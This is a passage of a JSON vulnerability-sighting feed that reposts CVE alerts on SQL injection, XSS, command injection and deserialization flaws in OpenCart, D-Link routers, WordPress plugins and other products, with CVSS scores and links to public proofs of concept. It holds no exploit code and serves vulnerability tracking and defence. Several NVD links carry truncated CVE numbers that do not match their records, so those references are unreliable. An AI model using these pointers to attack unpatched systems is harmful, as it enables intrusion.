OpenCart. It has been rated as problematic. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument headermenu_id leads to sql injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T18:30:23Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T18:30:22Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0214\n2. https://gist.github.com/mcdruid/ff4f29f4e830e9e91988c195d039\n3. https://vuldb.com/?ctiid.290159\n4. https://vuldb.com/?id.290159\n5. https://vuldb.com/?submit.44299", "creation_timestamp": "2025-01-05T01:34:46.000000Z"}, {"uuid": "3eb615bd-f982-47d9-925f-482c22a9d4aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP3X-9QPG-Q385", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/77", "content": "\ud83d\udccc **CVE ID**: GHSA-vp3x-9qpg-q385\n\ud83d\udd17 **Aliases**: CVE-2024-41766\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3  could allow a remote attacker to cause a denial of service using a complex regular expression.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-1333\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4166\n2. https://www.ibm.com/support/pages/node/180203", "creation_timestamp": "2025-01-05T01:35:24.000000Z"}, {"uuid": "b55d5ad5-a098-4e9c-ae51-351f7730dc5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WV9-JQ79-5P63", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/73", "content": "\ud83d\udccc **CVE ID**: GHSA-2wv9-jq79-5p63\n\ud83d\udd17 **Aliases**: CVE-2025-0212\n\ud83d\udd39 **Details**: A vulnerability was found in Campcodes Student Grading System 1.0. It has been classified as critical. This affects an unknown part of the file /view_students.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T18:30:23Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T18:30:22Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0212\n2. https://github.com/shaturo133/POCs/blob/main/SQL20Injection20in20Student20Grading20System.md\n3. https://vuldb.com/?ctiid.29015\n4. https://vuldb.com/?id.29015\n5. https://vuldb.com/?submit.44168\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:35:02.000000Z"}, {"uuid": "6da59f30-e160-45ee-ad07-bf82e813bc19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HMM-3G3P-P327", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/124", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-9hmm-3g3p-p327\n\ud83d\udd17 Aliases: CVE-2024-13135\n\ud83d\udd39 Details: A vulnerability has been found in Emlog Pro 2.4.3 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/twitter.php of the component Subpage Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T09:30:42Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T09:30:42Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13135\n2. https://github.com/emlog/emlog/issues/311\n3. https://github.com/emlog/emlog/issues/311#issue-255404584\n4. https://vuldb.com/?ctiid.290209\n5. https://vuldb.com/?id.290209\n6. https://vuldb.com/?submit.46929", "creation_timestamp": "2025-01-05T09:36:34.000000Z"}, {"uuid": "a54bb56f-7d11-47c4-a2aa-2fa75f3776fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V62-R8M2-76M8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/123", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-9v62-r8m2-76m8\n\ud83d\udd17 Aliases: CVE-2024-13136\n\ud83d\udd39 Details: A vulnerability was found in wangl1989 mysiteforme 1.0 and classified as critical. Affected by this issue is the function rememberMeManager of the file src/main/java/com/mysiteforme/admin/config/ShiroConfig.java. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T09:30:42Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T09:30:42Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-20\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13136\n2. https://github.com/wangl1989/mysiteforme/issues/52\n3. https://github.com/wangl1989/mysiteforme/issues/52#issue-25682365\n4. https://vuldb.com/?ctiid.290210\n5. https://vuldb.com/?id.290210\n6. https://vuldb.com/?submit.468391", "creation_timestamp": "2025-01-05T09:36:28.000000Z"}, {"uuid": "f9b13355-58c9-4708-9ae6-e98cb20367db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W82H-8C9G-F268", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/151", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-w82h-8c9g-f268\n\ud83d\udd17 Aliases: CVE-2024-20144\n\ud83d\udd39 Details: In V6 DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS09167056; Issue ID: MSV-2041.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20144\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:17.000000Z"}, {"uuid": "9a3f56f4-cbe4-4d94-a346-a2dc1b457778", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P22M-5PRX-9RM7", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/155", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-p22m-5prx-9rm7\n\ud83d\udd17 Aliases: CVE-2024-20150\n\ud83d\udd39 Details: In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01412526; Issue ID: MSV-2018.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-502\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20150\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:26.000000Z"}, {"uuid": "17f111a6-a518-4e0f-8d9c-f881a848e062", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCP4-P2MP-8FPQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/78", "content": "\ud83d\udccc **CVE ID**: GHSA-vcp4-p2mp-8fpq\n\ud83d\udd17 **Aliases**: CVE-2024-10957\n\ud83d\udd39 **Details**: The UpdraftPlus: WP Backup &amp; Migration Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.24.11 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must perform a search and replace action to trigger the exploit.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-502\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1095\n2. https://plugins.trac.wordpress.org/browser/updraftplus/trunk/includes/class-search-replace.php#L411\n3. https://plugins.trac.wordpress.org/changeset/3212299\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/429ed3-96b2-41-8a2-89b9a21ec058?source=cve", "creation_timestamp": "2025-01-05T01:35:30.000000Z"}, {"uuid": "19946f20-6515-4ce4-96bd-218f6e517767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9CC-2Q3J-JFM7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/173", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-q9cc-2q3j-jfm7\n\ud83d\udd17 Aliases: CVE-2024-33112\n\ud83d\udd39 Details: D-Link DIR-845L router v1.01KRb03 and before is vulnerable to Command injection via the hnap_main()func.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:58Z\n\ud83d\uddd3\ufe0f Published: 2024-05-06T15:30:39Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-77, CWE-78\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-33112\n2. https://github.com/yj94/Yj_learning/blob/b59925953d8bbb286a63f0019bb54c161cb61/Week16/-LINK-POC.md\n3. https://github.com/yj94/Yj_learning/blob/main/Week16/-LINK-POC.md", "creation_timestamp": "2025-01-06T15:38:19.000000Z"}, {"uuid": "266680b6-cabb-4751-a3de-6c3e9fef52cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X629-5XFF-W7QG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/172", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x629-5xff-w7qg\n\ud83d\udd17 Aliases: CVE-2015-2051\n\ud83d\udd39 Details: The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:58Z\n\ud83d\uddd3\ufe0f Published: 2022-05-17T03:11:58Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-77\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2015-2051\n2. https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10282\n3. https://www.exploit-db.com/exploits/311\n4. http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051\n5. http://www.securityfocus.com/bid/2623\n6. http://www.securityfocus.com/bid/480", "creation_timestamp": "2025-01-06T15:38:11.000000Z"}, {"uuid": "1c7046d8-6afb-48fc-b48e-cb8e4e0a6080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FRJJ-4MJW-3GMF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-frjj-4mjw-3gmf\n\ud83d\udd17 Aliases: CVE-2019-10891\n\ud83d\udd39 Details: D-Link DIR-806 devices allow remote attackers to execute arbitrary shell commands via a trailing substring of an HTTP header that has \"SOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/\" at the beginning.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:58Z\n\ud83d\uddd3\ufe0f Published: 2022-05-24T16:55:32Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-78, CWE-94\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2019-10891\n2. https://github.com/Kirin-say/Vulnerabilities/blob/master/IR-806_Code_Injection.md\n3. https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10282", "creation_timestamp": "2025-01-06T15:38:33.000000Z"}, {"uuid": "12f16078-38c1-4dea-af41-998f8eb91db3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CW42-CP8C-QV2Q", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/81", "content": "\ud83d\udccc **CVE ID**: GHSA-cw42-cp8c-qv2q\n\ud83d\udd17 **Aliases**: CVE-2024-41767\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-89\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-416\n2. https://www.ibm.com/support/pages/node/180199", "creation_timestamp": "2025-01-05T01:35:47.000000Z"}, {"uuid": "4635e46c-89a2-49bf-a33e-cfa3d7a11982", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PRCJ-7RVC-26H4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/710", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22136\n\ud83d\udd39 Description: Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.217 , Tabby enables several high-risk Electron Fuses, including RunAsNode, EnableNodeCliInspectArguments, and EnableNodeOptionsEnvironmentVariable. These fuses create potential code injection vectors even though the application is signed with hardened runtime and lacks dangerous entitlements such as com.apple.security.cs.disable-library-validation and com.apple.security.cs.allow-dyld-environment-variables. This vulnerability is fixed in 1.0.217.\n\ud83d\udccf Published: 2025-01-08T16:02:01.460Z\n\ud83d\udccf Modified: 2025-01-08T16:02:01.460Z\n\ud83d\udd17 References:\n1. https://github.com/Eugeny/tabby/security/advisories/GHSA-prcj-7rvc-26h4\n2. https://github.com/Eugeny/tabby/commit/93513541f7161fa8a59491603cabb6a101c0c08e", "creation_timestamp": "2025-01-08T16:14:36.000000Z"}, {"uuid": "2f1592c4-bf8f-4a21-abab-c13f528105bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0222", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/978", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-01-09T17:03:59.375Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0220\n5. https://access.redhat.com/errata/RHSA-2025:0221\n6. https://access.redhat.com/errata/RHSA-2025:0222\n7. https://access.redhat.com/security/cve/CVE-2024-11614\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-01-09T17:17:32.000000Z"}, {"uuid": "2be9c657-7985-4c09-9442-502969f20e52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JRXV-486P-M4JQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/110", "content": "\ud83d\udccc **CVE ID**: GHSA-jrxv-486p-m4jq\n\ud83d\udd17 **Aliases**: CVE-2024-12279\n\ud83d\udd39 **Details**: The WP Social AutoConnect plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T12:30:32Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T12:30:32Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-352\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1229\n2. https://plugins.trac.wordpress.org/changeset/32115\n3. https://wordpress.org/plugins/wp-fb-autoconnect/#developers\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/392d8286-a5fd-4d5d-9f6a-f13564013edc?source=cve", "creation_timestamp": "2025-01-05T01:39:15.000000Z"}, {"uuid": "d773a35e-859f-4cdb-87a6-98f01ddac591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP5X-6FMF-7FR6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/119", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-vp5x-6fmf-7fr6\n\ud83d\udd17 Aliases: CVE-2025-0219\n\ud83d\udd39 Details: A vulnerability, which was classified as problematic, has been found in Trimble SPS851 488.01. Affected by this issue is some unknown functionality of the component Receiver Status Identity Tab. The manipulation of the argument System Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T06:30:29Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T06:30:29Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0219\n2. https://vuldb.com/?ctiid.290198\n3. https://vuldb.com/?id.290198\n4. https://vuldb.com/?submit.464906", "creation_timestamp": "2025-01-05T06:38:33.000000Z"}, {"uuid": "c987b5c7-5ef7-4085-961f-e8231e51189a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQGX-Q2FG-HWXM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/118", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-cqgx-q2fg-hwxm\n\ud83d\udd17 Aliases: CVE-2024-13131\n\ud83d\udd39 Details: A vulnerability classified as problematic has been found in Dahua IPC-HFW1200S, IPC-HFW2300R-Z, IPC-HFW5220E-Z and IPC-HDW1200S up to 20241222. This affects an unknown part of the file /web_caps/webCapsConfig of the component Web Interface. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T03:30:29Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T03:30:29Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-200\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13131\n2. https://netsecfish.notion.site/IntelBras-IP-Camera-Information-isclosure-15e6b683e6c80a89f89daf59daa9ea8?pvs=3\n3. https://vuldb.com/?ctiid.290205\n4. https://vuldb.com/?id.290205\n5. https://vuldb.com/?submit.464258", "creation_timestamp": "2025-01-05T03:36:04.000000Z"}, {"uuid": "6b9a24dc-2f44-47bc-8a2a-9b6431e6fb75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7H6M-3862-6XR6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/85", "content": "\ud83d\udccc **CVE ID**: GHSA-7h6m-3862-6xr6\n\ud83d\udd17 **Aliases**: CVE-2025-0208\n\ud83d\udd39 **Details**: A vulnerability, which was classified as critical, was found in code-projects Online Shoe Store 1.0. This affects an unknown part of the file /summary.php. The manipulation of the argument tid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0208\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/24925a20d1f9336858dee1cbbb30c249\n4. https://vuldb.com/?ctiid.290145\n5. https://vuldb.com/?id.290145\n6. https://vuldb.com/?submit.44038", "creation_timestamp": "2025-01-05T01:36:13.000000Z"}, {"uuid": "d04af26a-c507-4a45-8993-4ea753e69152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85GG-89QV-8PVC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/84", "content": "\ud83d\udccc **CVE ID**: GHSA-85gg-89qv-8pvc\n\ud83d\udd17 **Aliases**: CVE-2025-0210\n\ud83d\udd39 **Details**: A vulnerability has been found in Campcodes School Faculty Scheduling System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0210\n2. https://github.com/shaturo133/POCs/blob/main/Blind20SQL20Injection20in20School20Faculty20Scheduling20System.md\n3. https://vuldb.com/?ctiid.290155\n4. https://vuldb.com/?id.290155\n5. https://vuldb.com/?submit.44112\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:36:06.000000Z"}, {"uuid": "ba643ef0-494e-4d54-9938-1586d89db69a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJ25-CHFX-QMX5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/156", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat 